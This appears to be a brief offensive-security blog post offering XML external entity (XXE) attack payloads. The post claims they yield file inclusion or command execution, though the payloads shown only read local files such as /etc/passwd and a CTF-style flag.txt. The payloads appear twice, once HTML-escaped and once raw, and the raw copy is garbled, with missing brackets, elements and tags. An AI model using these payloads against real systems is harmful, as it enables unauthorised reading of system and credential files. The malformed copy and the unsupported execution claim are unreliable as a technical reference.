XXE/XML Attack

Malicious DTD

Following snippet can be used to get Local File Inclusion or Remote Command Execution on vulnerable XML.

<br />&lt;?xml version=”1.0”?&gt;

&lt;!DOCTYPE cred [&lt;!ENTITY xxe SYSTEM “file:///flag.txt”&gt;

&lt;!ELEMENT cred (username, password)&gt;

&lt;!ELEMENT username (#PCDATA)&gt;

&lt;!ELEMENT password (#PCDATA)&gt;

]&gt;

&lt;cred&gt;

&lt;username&gt;&amp;xxe;&lt;/username&gt;

&lt;password&gt;dsfdsf&lt;/password&gt;

&lt;/cred&gt;
&lt;?xml version=”1.0”?&gt;

&lt;!DOCTYPE cred [&lt;!ENTITY xxe SYSTEM “file:///etc/passwd”&gt;

&lt;!ELEMENT subnet_mask ANY&gt;]&gt;

&lt;details&gt;

&lt;subnet_mask&gt;&amp;xxe;&lt;/subnet_mask&gt;

&lt;test&gt;&lt;/test&gt;

&lt;/details&gt;

<!DOCTYPE cred [<!ENTITY xxe SYSTEM “file:///flag.txt”>

<!ELEMENT cred (username, password)>

<!ELEMENT username (#PCDATA)>

<!ELEMENT password (#PCDATA)>

<cred>

<password>dsfdsf</password>

</cred>

<?xml version=”1.0”?>

<!DOCTYPE cred [<!ENTITY xxe SYSTEM “file:///etc/passwd”>

<!ELEMENT subnet_mask ANY>]>

<subnet_mask>&xxe;</subnet_mask>

</details>

Tags: LFI, RCE, XML

OffSec Blog

XXE/XML Attack

Category

Archives

Meta